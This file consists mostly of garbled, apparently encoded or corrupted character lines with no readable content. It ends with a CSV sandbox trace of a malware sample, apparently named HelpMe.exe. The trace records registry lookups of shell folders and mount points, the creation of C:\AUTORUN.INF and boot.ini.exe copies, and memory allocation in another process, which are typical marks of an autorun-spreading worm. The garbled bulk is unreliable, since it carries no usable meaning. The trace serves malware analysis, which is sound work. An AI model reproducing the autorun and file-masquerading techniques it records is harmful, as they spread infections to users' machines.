qXIawcb
(@TU\C)Uu
FHDB\XA
bat!s1j
geaNOqa
W\EvW$JC
C1V3CPL
PBNEMP
bat!s1j
geaNOqa
W\EvW$JC
C1V6TX\L]
YTDOJA
d7u!|ge
bawsg^Y
VD5_2K
\]RE@F
d7u!|ge
bawsg^Y
VD5_7\
gcwv$6gC
OF]$XXQ
u^K'0n}sbg
AU@IP)S!
A\Dm^1A^
bTUS$_
f4&w$d2
0"'hme
/bd[\T
LbW\V]PcD$L
C6a"t$a0F
ZVY\UCHB
ZzCONGC{^`UV
F7	bK^MTK
]r_XPCI
2b"q&7f@
\UCICD
N}LK^U
hRDUE[[jDENTGd
@bawaiqe
}_GT%K@G9'
'*7 ~m
azgJYBMYYTwY\Q
pADWSMC~
\JTA]CO
UX\U@OALKY
~GUVvK@G
cczt#b`
{MBQF5
UX\UGHBBKY
oPTULGjK
dlr%vd2
^_aqubj
TA|_!J
0ZfE_MPN
73qrs`b
_yCONG
pIC6H_VpQNh(
cdzsr`b
ATDbVg
C DTWBP~PT
73qrs`b
	WlMOT
Q[\SJN
a1w{ d1C
OF[,DYVG^m
sq~g_Cambtxt
JKZUC[_V
+K@Ga^G2!&
Y[0n31
BQj][SC~#mKFYVW_EV
PFuS]]FSFmARQKQ
!p-#gptfc#rsC=o
5K]BQs
Ca6'v'bg
Dn['00
]Iv^_T~QYT
hUWOI^[dNCE
\M^^_	AROU
'SB_DP\x[
saxum7$w}
$u+w6zzf4d+1w
UX\U@OALKY
~GUVvK@G
cczt#b`
{MBQF5
ATWYGECO
dGKmAQViI[#M4D
dlr%vd2
~us)>{xpq~-uG
qHBCSOpa
','00'm\VKCL
Z}AONGF}V`UV]Df_aK^
PTPSTRT
HD`TQbDS@
7WUF\r
F`lz s16
UCICDT
lMO6x}
7<7WOVvUR
Z}AONGF}V`UV]Df_d\V
cST~FW
*S@vA`A
Ga1pz|0e@I
Y[%ii{
6!$adk
aog?#qY@iI[Ex:
Y[]$sEBBU_E MBV
CmVKD]E~IoDSE]McRPDBY@H
TGMQXG[
&6PUtC@W
v9y|ebu
O[B7VrIDUB1
{_^C]llgG
bKFDERtURPDZZg\WPIk_RW
X@QdENS
w%*)6 [_VGA
LJU>Y\Ug
&ONGB7VrIDUB1Wu^K
kW^SvC`o
lgzaulXBPD^W
HUuQKK^G
!vy$b,z;c|y%CJ
qs{}kq!=4a
@2m& rcb
QL	QJST
aCF3DLD
CJwH]dEN	]qMCpEP_R
[,LF&A^
EAFLIFANq
]E{FUBNMR
kfc^\^ZQCZ^^dMAT
6GVC\R
	QHU	T
20w"r2aAH
^G;? 4}ow
_[l5YSB_C^
q{NAX[BG
Vo]E_M`XZ_DC
	UWRUQV
PDiA48F
EHEBPU
a0"u|`j
geaNOqa
NHaS\C\y
D]H	SC
GtP@VO
WY\QBHEZQY
pTU\dEN
ODfltzt5`
C^SS@*
t@G\D7_7W
ATWY@B@A
fGKmDW^iI[}Oe
d3rpvj0
-(rinwb0d'w`iaf$7
MPDGC^G:$
&16:<LpgZ\N
D`_Y^E
*DOsVWCeVgEZEU
$[_V68aog
\A7A@gG
t@FHK1[cHPUH
&G^[tMN
+essucbG
rIDUCe^4PEV	]hW]AQ~C`o
wTWUEREY_]
:@^CPUcJjK?0n}u+c
^~EONG
[2,hrz
TNa(/8
	QYeu@YE\
V]GV^[
+essucb
A[euu!os|qcb!g}~m!
\ZWU]^
QXG?GKm'
&MZxKFU
@CQSK_VDI
qe;succ
8FphkF
FGKKEDB[
|'}qsxy
_QE^R@luddF]GBesBACU^G`WJ]]\Z~|MX[SKIQdrJ@ZVE
SRRUQRXVR]
AHEGT[
ICd\R]q
jl u'6a
Dn['00
xxskgmaafgbvkgcg~
^@eLU-TJ
GTk{PV
BhqZ\NYBUP
/lK^UB@CCV\
fC_ZQr_NI
kwoa#f0D
)TsOGTEf
JKSZGV^[
pIEiBWBOoV
HF %|}bd|
JYGcW\G
c\QSuX\U
e{wwsq
[SSDz^{A
PIEQDFBO
0lq'qk6
)|$k<'`0cqzvsweub
HSqCD#
PCQ<37
:=FCUQpa
CY_^lt
<W`hG@
W{ICVBd_cCXBK
WUPVPP
V{DGBiSIuZ{
JK?00:6'6O
*UQTvY]T
cER{UHI
"\OooP}Vs@DR@e_bQPU
@cQSsYGDIfC@W
2QUQ'0.aiq
PEVGjK
me;succ
AKU6Q]U
@hxmTrHMUDg^gB]ET
@cQSsYGDIfC@W
2QUQ'0.aiq
GMFdEN
iI[~ks;ucc
7\G@N=:
EDpIE\Cc\cUQP
fGKmFU^iI[#
;G_[55,!w~gu^KVId
amn}ac+
@cER{T
BIEmwABPhdVdUCJYX]m`___QQKGoqZ\N[@UP
bbuaiq!GKKQXP
dEN7HY
U^{UIt
6.'6!mJ`I
UCd_bTP\
3Biwinzeeat~dlca}|
N\qAP{GU
d]VBNV
Am`_WQ
ECX[Y>f
V]]TEWG@SO
cJKXG \
jd%pr2cG
C\W^@EBI
jKSeAG^[bS\WIg@`
v/}fa|A
FFJF]zRO
IA[@gU[
uQGIXMF
!(D[\TJIDGT]
cSOPr_NI
kwoa#f0D
)TsOGTEf
\QS]QXPM
~G_xBUXrR
"%/(`cr
\)s :h|~wv.i/xw~}{$G
qCDBGQPI~+
010,<=~|MNEA
^yF\RUF~WtW@QEvCuC]LG
CICDU\
g:dEN	]mE
q}CCFQ^V[oPAY^Wlg\]YSZSAdkLDXM^GF
FGjK]T
w1&": V^[
HLI.Q\EUuI2
980 PcD`UV
!(NBfPUER}P]U
|WoW@]TIfQA[VCR
6VX]%_
qdrtsq
Bl3,+)'
#`UVG_v
v}tmksw_Xg|dnlcra
q[TDUMP]k
^UGe4Z
FmtCKG
j1@GBQXCh>C
JK]QK[_V
Fbl{"&eb
AvCuCXCS
CQSYQyx[
kUP|AU^xSK}Vc
jc}~epi
q(v=;*+vp{itt q{*q
MCWFP=(]
A>f]ZFCUElsW^P
0 Z\N<'&1g^Y
VD5_7\
RFJFGTP_JA
(RItL`@
@jauwp26
X!' *&0!7?gbv
':17dEN	R
MJVUMP
VDlgY_
_U_~-;
HMhrMEXM
V^[pIC6#
X{UHI]
^~E]STJmJ`
MZo@dYTN
JK]TDOQXG
6X\|T[ 4q]VENQEVm}YPD]KAR@huELP]GQpaME@UXMa
VXREep
aD\L\~
F5gruvbe
HPySAgu]
blstvbc
~rr?npfk1v*091fte
CGPFR>{
F>rAFPILBfUP_K	
cdzsr`b
B*_&HM]
7YfD_A]
d\R2LW
rv+z7kq
!(qgsr|cd
]Fh]XSlMOT
R^zQN'N5
rt()a3rC
~{u{sn)*-),427-$li
oEA!:0,#'
uELFCU
15BR*Y5
~#mKFYVW_EV
BDzSUjK]QvCAGK
 \iZBZZ	\k
RXDBKLA
@e7zwsgfCI
j-,5:0,!& #vsw
77CXG*
5iI[~k
,#'$C^Gl5YSB_C^
UIoQ[BT]qTPTCC
asptu|
R3DQF[zCZEUgTuDEN#20?!7(
Zcessubb
PBl`KDTJdXaTQT
.QXG+cen
  CXGdEN
moc|'}qsxy
7LS6BX7M=JRn}_ZE	B\UM?d
BBkuLG
V93X\XW^
E>|LFXZ
PFuS]]FSFmARQKQ
!p-#gptfc#rsC=o
A7`!rqgq
VY]TK[_V
}:.$-:
JOlwbxzoevpt
@CQSK_VDI
WIg;%GMV#
UFrKG]DGHcRW]Q_
Xr&(pk~zn4vv%
#tw}3*unad|l|
*zqm}`muq|}ac%!%+6[_V	
< 1* <DX~g
^T_GCm&
9}Q05M55:
!(FEtTJYEVUqSWTBE
sslipxwgpic"
Fr|y|c/ph6b,m!
IAeUV{G
X)\MsLbCI
2b"q&7f@
"7-*"9
-qipqya/5
&@gGIU
c^S@GQBGpo
' BIEmqW^P
PAqEXT
^aD\ESQ
JKS\GV^[
pIEiBWBOoV
HF %|}bd|
[gKARZUcVMP
bRRUvYXT
gauaiqb
xD[TPJv^ 
VE0	`TWW
@UEEQLEK
j` zw7g
N\qCR{GU
eBXMUqZ]U
bcmwqeq
TTDySz@L
PIEQDFBO
YDRsAbA
7a{&r12
gUXWIlW]U
bRRUvYXT
gauaiqb
xD[TPJv^ 
VE0	`TWW
@UEEQLEK
Ajg'w}6d@M
]AQlMOS
!(u@YE\v^_T
bdumqge
SCyPwAM]
^G_^ADD@
2T]BS|M4
Fgm&t'2kGO
AbUNYGxQ]G
/XGSTwP\R
carrs}g
\~K@GK
GW*DTZ
yWtOA]Jl
EWW_JC
GHaWU@
Gd7"{ 0d
XRzCZEUlMO
cbprucg
SBbYbJPL
R`BSKL5X^
66tstgd@
Z@fC@W
blstvbc
b^dST\
cdwt'e1
HSjEF2;
blstvbc
b^aD\L\
FJFgTPgLP
IAderwr1e@
Y[ C\l7
!(qgsr|cd
VE.V'@
VRA><FT
d7u!|ge
cdzsr`b
B*_&HM]
7YfD_A]
cdwt'e1
HSdEN&
cbprucg
SBbYg]X\O\U
JFHD6PVfC\G
A] O5C
G0bsrqd1
ML	QJST
/Ywqstjc
OD[wBTS
VRA><FT
d7u!|ge
r^M0000g^Y
VD5_7\
RFJFGTP_JA
aQ]AR'N5
g`"&q2dC
VX]]QUQ
;C@W2<
'"4):=E
_zMONG
$LMRJe	dE
R^zQN'N5
rt()a3rC
VX]WQUQ
2LHNG^
XlYOSQJmJ`
IAeUVeB
oUZAP$
Ct"-y7cq
XiI[KW\
CICDU\
lMO6x}
XlYOSQJmJ`
G1RW`AR
O4XXCQp
's*(`0t
UCICDT\
lMO6x}
7<$QIkL|N	%
X`AYTG^mWvAVIQ2Z1
%%|.dfq
/0,7q/&
)S{NMT
|UHqO5
gcwv$6gC
XiI[KW$.6 ,7),q
:3+	=NI
ZzCONGC{^`UV
F7	g\V]
's*(`0t
UCICDU
a?&*'g^Y
VD5_2K
PV^EMG
5V\DQr
pu|-0f$
WX^G_[
qDM!! 61q^(
f4&w$d2
VY]TA[_V	
#DR$N[C*&
AU@IP)S!
A\Dm^1A^
2BUCMa
MGr ~-g1!
ZVY\UCHBFGA
;M[gZX
XlYOSQJmJ`
IAeUV{G
X)\MsLbCI
'v(~66p@
j-,5:?605)2oma
;'1GjK
<DXUC^G4
DlgY^U
^bsIDX_Phx
qqyaaiq;dENUU
cK%) +
]DgE@Fo[
bVVCDPBUo{[[\[F[DX~c[^FCUKkqEDKR
:4Z]^UPP
C4DXBSsQU]@NA`c'%wbe
DZTG^m
JoCTFMfCa
upy|fdw
6JW QK
tQR\R@;h
ecv{|k1@O
HDZw__T
@mJ`HEREvCp
HMOB@Q]
!(fW\TMUqZ]Ug
k{wvqq
NHq[\SwV
zYo%12+piru
bcq&$ej
GZ"ZU\N
/[XG>;
zWBYdF_E
dfrsu`e
N\gL[CVEL_q[\SwV
zYo%12+piru
@vXXR,W
=$a5x$j&'
UX\UGHBBKY
~GPP~K@GD
A5`zt|b5
|D[QTD}
#OMVJc
WY\VEKKZQX
aFWQVIdQ[Wg
5dpp|0`FHDTM
>xAB[g
uQGK^GRqSAIQ
DR"676&,.}~g
6Kyod[\T
`dssqbb
!OESEaWnJ
R9397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.446","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b
!"XBvG
>C:\AUTORUN.INF","dwDesir
ccess->GENERIC_READ"
,"1,:",(d5cv
q88ac6
Jdfz173162e)61
y6f1e2
y8s6ceq","
gf9les
CCE3qb,
~0;000
qw31004116.
rCRWVId
>QXP*woa
64m\G^3UIuHq
,NIlCAGEu&CqX}(#lftlc4vy5o0j!c
FbCT~]@
@Tjq^D^
TGpTBX\QUxAOGBG
kg(p1/vfe|p"
QvC\Y(U
Ap#,~w~g
HM181<2nca
DGQBUms_P@C
PF}G_KCQ\cOA
~rwt4zt>b x 
HD`TQ|AS\.
di#03&&+!1+9}yq
 GMV	6:
,%1$2PI~r
B\Q^TmvUN\J
lpldxad~
FFp]QEP
Xtr/u7p'nk} '
qpv|j+!<dd-2w
"Z]YUp@
@16pu!5a
dEN)B_
GXE@pD
2e&z!bj
JWUUA;hG
\GrUTBQBB
"Z]YUTLPW
!(PWWXJDEJ
fTV~^Q_rGUgIc
q3v #fj
MA^zSO
y''~n{rr~{+$
EC^Gm|^UPCQ
[cPFEPUq[_^SuL
gLVKN5Q	G
@6gaog?#cHFPIQ
3LRDS}YYG
PZr^MEQ[V
QvC\Y(U
Ap#,~w~g
BL1ii{	%=74-3
VDETBUl}KOP
\T$.,,(@/
CK|HRuX\U
b\Qm\G
4CXK)/
> 7$/+`
X@qxhiWI
cXUEGQFTm|GW@VQCDEh{ma
HDVT@ZRS
ICr\EPT
qyartde
@U^{UJqZ{
,+'!M@a_
**)&3aa}9t
{l5YSB_C^VD~cn)RB
VpEW_UE
_{MVnW
]FtLL\K0
	B+E\K
BUWK~~PK
bRT`EUFHgPBAW|Z{
~cen3g&D
UGxMrCRWVIr
!(fWFXZU~\r_^@C^Z
ewoatgk
	QHU	T
AT_K_V
vcen9"
WX`WJD
Y]E]vCUUoIO<
LJU7RZTQ
AVC\QDATR
bbuaiq7GZKS
D UFYSGeM/
"CAG~k
f`nJIoT[ST
F[k^wWLXP	Y 	Q\
R	U	T	
FxXt@^_]
ICXp]{B
@7ZC\N
[W7@U_y
055G^qY
R8	<-:?
&59-#$'ew~=
C_VDls
VQU\]U
TSUWVW
V^[fIT;
&BZ&BS
=^QQUUT
\Ap^uFWVUF
CIBDUO
me;subaDO
FUBNMR
"DRU6Q]U
s|raL^s
WSPQT	R
FTG^UG
\iI[II
618=,-
0)$nvy6u
\@cM@gG
_p^uFWVUFbXLK
WCeZKS
WQ~GEDEXGH
me;succ
w`}`mrut}ac%}*(p
APDSiuP[
k7! ve7D
F[k^rXXV^M
519`YD501n{c+
~W2.hgo4
sq|o|qsjel)RcW
`xlDWBbPJR
]Dz[XG
@KY\UK
ZFzN\J
e\V)CR
MAeduupkj
	+{ k;
vz"z=(sadk
_wTFYWT
B*	vVYMC	_t
BUWXCDPU
a3 pqq
rEVVUCeYXI
x{tionca-<
+1W^L	
~KR3UI
WSPQT	R
PTV^EV^[DEN7
ws;ucc
ODYIdLS-VNL
jrZWFK\K>!/`
FPE\U'PT
Zv|v$1
ridpy}
bcq&$ej
	~ii{9%#&25,9$.jel
@gG*x}
*5'UMPGpa
D[LQEyDn[EQKvCp
UXEGCO
ICd\TvG
@6gaogbb
ZVY\UCHDLGA
@cER{UA
_Q0U:#
dqQy[ADTT
oyU\D|T
FFp]QEP
Xtr/u7p'nk} '
qpv|j+!<dd-2w
XzSOp@n
N@0fu'#ab
*.w{sn~rvz}ac.-$!7[
* 7< MJVl;
`B[RTE]}s
[W7@U_~QIuHu
V\pU\MOC
yG8.hgo4
sq|n}qsjel#N|P
c_VDGQFGQGKQB^J_QGms
V^[qya
RILiI[->>NI
me;succ
^~E\[]PcD*2
 8;aqupxk}cNBk|u
gZ_V[CCQda@C
iz{jx"
AHEGT[
ICaKZMR%Y	WF
j6u! aq
b]Sm\G
%mJ`*!&0
y{umn}~muyfomay}vg
5@[|\HK
UCYEZ^Md!-.
MAdTWRsQU]@NA`c'%wbe
DZTG^m
pIC6HYgDQFItlfWWuIn
beswtbb
BTp_Y]
@16pu!5a
LbW\SRDmJ`
uCQUDGKcNWg
dfrsugb
 \URwP
_s_e3xw|.4emdSRQJL
@GHcRRREQ
!," !00+7(ch
_oCVvXUU
cewrte}
,PsOBPKmW0
fmz{'10
^uXZWH_
PG^mWsNBG_v	;	
ZxKFUwP\R
carrs}g
\~K@GK
GW*DTZ
yWtOA]Jl
kl{!'0`
Z{r|:i.*qc`}|pt~kbgDEN	
~aK0',0*5'~omo
XlYOSQJmJ`
HD`TQbDS@
7WUF\r
F`lz s16
UCICDT
	+CAG~k
tIPQEM
ZyCONGC{^`UV
F7	bK^MTK
F0[CBFPZs	
6g'p|j0
!LZrZ^G
\@qTTJ
VrIVIQ0
!(D^q]U_TREY_ZeHAK
SBOEA]T
64uzvjdA
edwwuq^(
r^MRQKQefK
cwoa#?
PCVGOVExY
^yF\RUF~WtW@REvCpTU\
qdrtsq
CICDU\C
cesrvaq
}|+ytlK
_cE]RU_
VrIY&Cd_zBYDU
]	X[WR
QUWPVW
DdK@GEuU
CRQK_V
2dEN6woa
]|WA@	
CTP_QXP
3dEN6woa
qPIEK_V
[W7@U^{UI}Lu
Cd_gBX
]Ab[V~\[
xZHPCA5P
^TEJBBW
0c!&wq
bU_2WIP
771`UV#2
]^bTUWIlPY]
	VjRKG
SR	\ZRS\
7fzz&e1G
]^g@[iI[
qL\P	V0
GORKi^
F`lz s16
_pK@G_[W
771`UV#2
]^g@[iI[
TQUW]W
WBO@ES_GM
0c!&wq
bU_{RIL%+
@RbAZiI[K
0e&q!`j
BUWYCL
GMF~kurqgc
]DnC@W
SR	\ZRS\
7fzz&e1G
]^g@[iI[
qL\P	V+
[][\CU
F`lz s16
_pK@G_[W
771`UV#2
]^g@[iI[
qL\P	V+
[][\C>
F`lz s16
_pK@G_[W
771`UV#2
]A}AWrGU
xWAMN5P
^TEJBBW
0c!&wq
bU_,RIL%+
qyartde
@U^sQ[iZ9lYO101
BDfL@gGH
a`q/q?
fmz{'10
^uXZWH_
PG^mWsNBG_v
bGj[WWBHoQ[FTuHc
hu|uw~g
5W]CS{YT]O\"CF-"
BTp_Y]
@16pu!5a
LbW\SRDmJ`
[Q~DQ^ihsgJg
dfrsugb
eDT}PA
!.0zr8
_DdfGAIBMUZ
bQPUpGXR
FTEg^dW
KGKKB@J[
Fbl{"&eb
[zSKH_
tzqef:
\UCKB@U\
gBDDUvYA&
~essucc
ZyCONGC{^`UV
F7	bK^MTK
cST~FW
*S@vA`A
Ga1pz|0e@I
C}RIL!
-37<0qIPF
T@wTCYFTUwMWREQ
^T{CA]A
64uzvjdA
0oCF69aNOqa
BFWDPdtQ
nf_]UYE
=uLAKR
BNCPTCkeJIN
G^QtdxVGQ]x\[\RuH
b{wz|q
lSRdFSPUt
4CXK<;
ZV\`B_D
fQ\EU~QYG 4aSSY\
WSPQT	R
DX]RE[_V
QXG?GMF
nE@!41:
SP	\QRQ\
@q@@\XQQVEM
@_XUx]^G 4a
lfp~s|fclGHBBKY
~dG]DuG
OJG\ZA
wrrreq
@kwoa+
&ONGPcD.	7
jf}ztmZY~AIBMUZ
lxQ]A{K
u^KETq_NI
JK?00:6'6O
Zcessuba
DUCd_gJ
PxDYVUPBl`KDTJdXaTQT
cRWFjK
NIQ*&7&(q
Zvqy|eb'
!.'xssO
hzcCOvfN
e|xpp|cJ
mbKYHj~`MRUTG_
EfIQXCRRcOA
HM>6: ?ko}
7(0E:I+ lip
_zMONG
$LMRJe	dE
s]Z\RsJGM
jfzt&c6
GjK?0n}
^~E]RG^m
yQdPTW
RXqNaeASDXV^cJAU
fDZESt
d6s&w7`
NGZdENT
]U]^@I
vCu!<7&hme
aDAW]EQef
D@c]]XUCXK	
bTQTvK@GD@r!:7&&'~
DCWQKmJ`H@]QxM4P
0c!&wq
VY\\C[_V
DUvY\UCO
_[l5YSB_C^TD~{K
9yVS\QyQLlmG@
SP	\QRQ\
V^[pIC6#
^~E]R\BmJ`
r[Y@M~cV[^V
WX[SQUQ
6X\}TM
abdV@_]
`V]T\lpTB]Z[H
pTPSpK@GPIE:&71<q
AKU=Hg
v#qnyp+lYO@IP'-'
Y[C,_bUQT
\R[kNGU
|QYTsCZ@WXvIZE
[VIdX]R
q&:016>
cerquq
xVrIDG_v
EZybG_U
DENTBNEVIOR^M1
dEN&PIC'0
&(<'GxJPIC
dEN6x}s=cc
`F^RS]Gqr
@(\JTA]Cn<
W_ZPK@K
F1@XBVw_^
`lt u6aF
@C]SG_QLbW.
bawsg^Y
XHeVMPEu\F^G
S3D^USFKp|O\W
BLvISt
@(WJVA\A;hG
WXZKGJEVIO
b3pt$c6
C\W^@EBI
dKS{DGMVT
ODfltzt5`
O]{}!?m}yppzm( uqzwrA
qCDEfVDGpo
9:KBF8
&7 :MB~uEL
CCVVDmJ`H@]QxM1G
2SMeX[
0c!&wq
@1GMF*
\@&YVM
nhfSDP
STQVWR_
NGTK@GBHDBGA
?K@GpIE
Dd:9&n{c+
=*5)rswr|}~g/&
^@bLR|VH
g~wbyujs~aKRFWQCD
[]XNB:pB
Y_jsMHUW
S_UVUjt
ojq,a#)~
UX\UGHBBKY
~GPP~K@GD
A5`zt|b5
|D[QTD}
#OMVJc
CUW]BEDW
pIEbQLtMN
b3pt$c6
SwRTRN
U@b[\GKWXG_[
iBKXG%
maaNOqa
W\EvW$JC
C1V3CPL
64uzvjdA
j-,5:0,!& #vsw
<DXUC^G4
DlgY^T
HLjdGQB
_[WTBC
	WQUQETZ
06![zCNYG->>NI
me;succ
3LRCTzU]G 4qFQCMEG
DENTBNEVIOPIE;
?K@GpIE
Dd:9&n{c+
036hpbnagup/&
^@bLR|VH
g^WBYUJS~aKRFWQCD
[]XNB:pB
Y_jsMHUW
C0crusfk
G\*FT[
p[XGBeXaPEV
HY_B@FI
!(pWWb\DaR]EUqIf
kcaogbg
FgWZ@]wY
~u^TCOIL
lcDQBD
_qWqIVhyv]bTXT
}^VRnE@
2[_V68aog
cesaiq?RjKNIl	+
A[BRUK
_wEZQTB
RsHBKGgYu^KEQ
TVVW	V
wp~zw~gDENG_[
&/$nso
DGQBUl/QA^M
{[DB][^~]eN[SX\CkvI@\[CTD
`DKXG4
QXP*woa
64m\GLgG
c-ssucc
9,-:nkdcqzd}XYg`
\G`DR{QH
}[^BUMPThuKOP	F
5SCE_ZVeh
ntNC]Y@
C0crusfk
G\*FT[
p[XGBeXdGMF_[QXG@B[/&
`UVhERAHfQXDTsVc
jcxxmpi
ZFcYUM
^SIX|^xVE~]
MAeduupkj
*T`UVTBcYu^K
JWEEFM
A\^|VHuHc
huqzw~g
rt?l{.s$u;|x{)*xt
(VOIXa^PGFW@
={PPKX
naYPCTYBtIP
/Ywqstjc
OD[wBTS
cSQzH\V)
efruw62
y|s{sa3;> =-,!6(p
q<374$!6~aKA^M
_GClsD@BGBV8+
P	RQTV
gTuqya
][AM[]DotIM_@DMUE
DENTBNEVIOPIE>
dEN7GKm#0-
~KQrWA
^eDFGPKUk~XSB[B^PZho_LHMFGdaYP
c\EJX	]k1_	P
X\K=&NAZYG]K
bcprsa6C
CuTMpZZ(
cdzsr`b
].~|nfr3ae$~1f1b|jCO
]Fe@Zr]
EPDVm{[
YJ\_C?g
@GBVgTEEKCL:9
jetptcc
EeYaGQM]O\R
gDSDLnXT
wwz}c` C
Y[#MeL#
/Ywqstjc
OD[wBTS
dSRwI]
+}'<mncap}h{coj/')G_[
@gG._W'*
=;$pi~
< 1* <DX~uEL
U^DfUCAYMB~=&
]R[UYVdeLAlW
ODSP[\B
Sw_ZPo
@$"zz14w
e"c6*`wb
@UVPCCAH
cTQaD\XiI[tLo
 t**`kr
p*&onzyvyug/# {
]QCDEm`_LHM
-3/*!6P
~ii{nwtc
q#f<4zvc
"/exrjN
ATWYGECO
dGKmAQViI[#M4D
dlr%vd2
,-whipdd` /bffjr1
MWE@WPI~?
9VzG42 #;
M@KAEG
`ASCXcB
4GG^[gP[CGiZ%GKK55;5w~gpIEm\G
cess&0q
N@.Q\EU~P\U
76*3&p_Olfodjue
\DbDTeQJ
MW@OC^G:x
DTXBc]KK
^^DVCj
8piz?`
BRTXCDFH
f\Qm\G_
ODsx~ud4v
y}slguw!#/l{%%zxxv
[a+umn"d'9
KOP^BXPVpu
.:W^P7
:.3$':@ENY
LQpYZ{!I
DQ~D8iD
_JGKNA
pcen'7"K_VPU
Jo=.7 	-#6$	'
f[*BXD
QBUl}Y
McVr]\XZYR@muHD]^DKF
~GV~GSLgG
>QXP*woa
64m\G^3UIuHg
NCqya+
j{=ios|qc0&qsp'
2>KnxMA_WMl`Z_T_CBmu[FKSLXtTFKKCL:e
\Z^\B:vO
F4WVyCTXy
Ac0q'vjjA
YL1ii{
&67*	3#:1gTuN\q3#
{f^KTI~
A[H$v_\TUB&
BXdU\HT
cRQm\G
' PUtC@W
c`}oma 
@cER{TH
U~VaGBC\^CeTBC]^_j~[U_AEGBh}Z\N	G
dpx{cpi
aog?#qY@{
_Q;$#-
<<6*9'
&7 GBV:
Mk~~eY_]_@@msEFCTXZb\DQEM_hhM@K
i|OI]	AR
SR	\ZRS\
SWx\N&H2
jl u'6a
LLU$}YSB_C
KncGAltA@[\CUB
C@WU=Hg
v",nyp-iI[
<&nrq+cucob
7LS&am
0/NEYYW^c?N
uKr}WfPCAbQJTIPU
ewoa764K_VB
bUW3MG^[>*	
Di		~KR3UI
P@U_MfRABY_ZmtN^X\DG^~dG]P
.F\]rR
j6u! aq
ueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Personal"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Generation"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Common Documents"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Common Documents","dwType->1","lpData->C:\Documents and Settings\All Users\Documents","cbData->92"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x00000110","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.496","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\AUTORUN.INF.exe","lpNewFileName->C:\AUTORUN.INF"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->268"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x00000110","lpFileName->C:\boot.ini.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
